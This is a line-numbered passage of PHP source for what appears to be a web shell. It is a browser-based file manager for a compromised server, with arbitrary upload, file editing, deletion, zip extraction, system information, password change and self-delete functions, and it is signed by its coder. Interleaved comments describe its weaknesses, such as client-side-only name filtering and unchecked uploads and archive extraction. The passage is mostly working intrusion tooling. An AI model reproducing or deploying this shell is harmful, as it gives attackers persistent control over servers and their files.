  949. $dir = getcwd();
  950. $scn = scandir($dir);
  951.         foreach($scn as $dirx) {
  952.         $dtype = filetype("$dir/$dirx");
  953.  if(!is_dir("$dir/$dirx")) continue;
  954.             if($dirx === '..') {
  955.                 $href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
  956.             }
  957. elseif($dirx === '.') {
  958.                 $href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
  959.             } else {
  960.                 $href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
  961.             }
  962.             if($dirx === '.' || $dirx === '..') {
  963.                 $d_zx = "<font color='#ddd'>--</font>";
  964.                 $ckh = '<input type="checkbox" disabled>';
  965.             } else {
  966.                 $d_zx = '<a class="a" onclick=\'c("?command=upload&dir='.$dir.'/'.$dirx.'")\'>U</a> |
  967. <a class="a" onclick=\'c("?command=renadir&dir='.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?command=deledir&dir='.$dir.'/'.$dirx.'")\'>D</a>';
  968.                 $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
  969.             }
  970.  echo "<tr class='ex-hov'>";
  971.             echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp;[ $href
  972. ]</td>";
  973.     echo "<td align='center' class='td-file'><center>--</center></th>";
  974.     echo "<td align='center' class='td-file'>$d_zx</td>";
  975.     echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
  976.         }
  977.         echo "</tr>";
  978. foreach($scn as $file) {
  979.             $ftype = filetype("$dir/$file");
  980.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  981.             $size = filesize("$dir/$file")/1024;
  982.             $size = round($size,3);
  983.             if($size > 1024) {
  984.                 $size = round($size/1024,2). 'MB';
  985.             } else {
  986.                 $size = $size. 'KB';
  987.             }
  988.             if(!is_file("$dir/$file")) continue;
  989.             echo "<tr class='ex-hov'>";
  990.             echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp;<a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a></td>';
  991.             echo "<td align='center' class='td-file'>$size</td>";
  992.             echo "<td align='center' class='td-file'>";
  993.             echo '<a class="a" href="?command=edit&dir='.$dir.'&file='.$dir.'/'.$file.'">OPEN</a></td>';
  994.             echo "<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>";
  995. }
  996.     echo "</table><table style='width:100%;margin-top:2px' cellspacing='0'>
  997. <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
  998.    <input type=hidden name=ne value=''>
  999.    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
  1000.    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
  1001.    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>";
  1002.  if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
  1003.     echo("<option value='paste'>Paste</option>");
  1004.     echo("<option value=''>-- Select Action --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
  1005. if(class_exists('ZipArchive'))
  1006.     echo("<option value='zip'>Compress (.zip)</option>");
  1007.     echo("</select></td>");
  1008.     if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
  1009.     echo("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
  1010.     echo "<td style='width:20%;text-align:right'><button type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></form></table>";
  // "New directory" / "new file" handlers. The name comes from request field "newinput"; the
  // character filter for that field (valid(), emitted as JavaScript further down) runs only in
  // the browser, so nothing here restricts the value on the server side.
  // $dir was reassigned to getcwd() earlier in this branch; x5, x6, x7 and error() are defined
  // outside this excerpt.
  1011.    if(isset($_COEG['ndir'])) {
  1012.     $cdir = $_COEG['newinput'];
  1013.     if (is_dir($dir.'/'.$cdir)) {
  1014. error('Directory Already Exist !!');
  1015.     } else {
           // Requested mode is 0777; the effective mode still depends on the process umask.
  1016.         if(mkdir($dir.'/'.$cdir, 0777)) {
  1017.     echo('<script>c("?'.x5.$dir.'");</script>');;
  1018.         } else {
  1019. error('Can\'t Create Directory !!');  } } }
  1020. if(isset($_COEG['nfil'])) {
  1021.     $cfile = $_COEG['newinput'];
  1022.     if (file_exists($dir.'/'.$cfile)) {
  1023.   error('File Already Exist !!');
  1024.     } else {
           // fopen(..., "w+") creates the empty file; the handle is not kept or closed, and the
           // browser is then redirected to the edit command for the new path.
  1025.         if(fopen($dir.'/'.$cfile, "w+")) {
  1026.       echo('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
  1027.         } else {
  1028. error('Can\'t Create File !!');
  1029.         }
  1030.     }
  1031. }
  1032. echo('<script language="Javascript">
  1033.         function cog(){
  1034. if(document.forms[\'new\'].newinput.value === "") {');
  1035.     s('Can\'t Be Empty !!');
  1036.     echo('return false;
  1037.     }
  1038. }
  1039. </script>');
  1040. echo('<script type="text/javascript">
  1041. function valid(field) {
  1042.        var re = /^[0-9-A-z.]*$/;
  1043.        if (!re.test(field.value)) {');
  1044.             s('Invalid Name !!');
  1045.             echo('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
  1046.        }
  1047.    }
  1048. </script>');
  1049.     echo('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
  1050.     <td>
  1051. <input type="text" name="newinput" onkeyup="valid(this);"></td>
  1052. <td><button type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="fa fa-folder-o"></i></button></td>
  1053. <td><button type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="fa fa-file-o"></i></button></td></form></table></div>');
  1054. }
  1055. echo('<div class="coR">
  1056.            <div class="coR-panel"><table>
  1057. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">TOOLS</td></table></div><div class="tools-content">');
  // Quick upload in the TOOLS panel. This sits after the command chain, so it is evaluated for
  // any request that reaches this point and carries a multipart part named "data".
  // The file is written into the current working directory under the client-supplied
  // filename, with no extension or content check and without is_uploaded_file() /
  // move_uploaded_file(). On success mtr() (defined at the top of the file) emits a
  // meta-refresh back to the directory view.
  1058. $path = getcwd();
  1059. if(isset($_FILES['data'])) {
  1060. if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
  1061.     success('File Uploaded !!');
  1062.     mtr('?'.x5.$dir);
  1063. } else {
  1064.     error('Upload Failed !!');
  1065.     }
  1066. }
  1067. echo '<script>function upload(){
  1068. if(document.getElementById("up").value == ""){';
  1069.       s('Select Your File !!');
  1070.    echo('return false;
  1071.    }
  1072.    document.getElementById("%").submit();
  1073.  }
  1074. </script>');
  1075. echo '<table>
  1076. <td align="center" valign="top" style="width:10%;padding-top:11px"><i class="fa fa-bookmark-o"></i></td><td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td><td style="width:20%" valign="top"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  // Archive extraction in the TOOLS panel: when request field "x" is present, the archive named
  // by request field "file_name" is opened relative to $path (the current working directory)
  // and extracted into $path. Unlike the mass-action code, ZipArchive is instantiated without a
  // class_exists() check, and the name is not limited to the *.zip entries offered in the
  // <select> that follows. Entry names inside the archive are not inspected before extractTo().
  // Every failure to open the archive is reported as 'Permission Denied !!'.
  1077. if(isset($_COEG['x'])) {
  1078. $rse = $_COEG['file_name'];
  1079. $zip = new ZipArchive ;
  1080. if($zip ->open($path.'/'.$rse) === TRUE) {
  1081. $zip ->extractTo($path);
  1082. $zip ->close();
          // The request-supplied name is passed to success() as given.
  1083.     success('[ '.$rse.' ] Extracted !!');
  1084.     mtr('?'.x5.$dir);
  1085. } else {
  1086.     error('Permission Denied !!');
  1087.     }
  1088. }
  1089. echo('<script>function unzip(){
  1090. if(document.getElementById("u").value == ""){');
  1091.       s('Select File [.zip] !!');
  1092.    echo('return false;
  1093.    }
  1094.    document.getElementById("sks").submit();
  1095.  }
  1096. </script>');
  1097. echo '<table>
  1098. <form method="POST" action="?'.x5.$dir.'">
  1099. <td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
  1100. <td style="width:70%"><select name="file_name" id="u">
  1101. <option value=""> -- Choose File --</option>';
  1102. $scandir = scandir($path);
  1103. foreach($scandir as $file){
  1104. if(!is_file("$path/$file")) continue;
  1105. if(preg_match('/\.zip$/mis',$file)) {
  1106. echo '<option>'.$file.'</option>';
  1107.     }
  1108. }
  1109. echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  1110.  
  1111. echo('</div>');
  1112. echo('<div class="coR-panel top"><table>
  1113. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MENU</td></table></div>
  1114. <div class="tools-content">');
  1115. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1116. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1117. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1118. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="lime">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table>');
  1119. echo('</div></div></div><div class="top"><div class="footer">CODED BY WILDAN IZZUDIN</div></div>');
  1120. ?>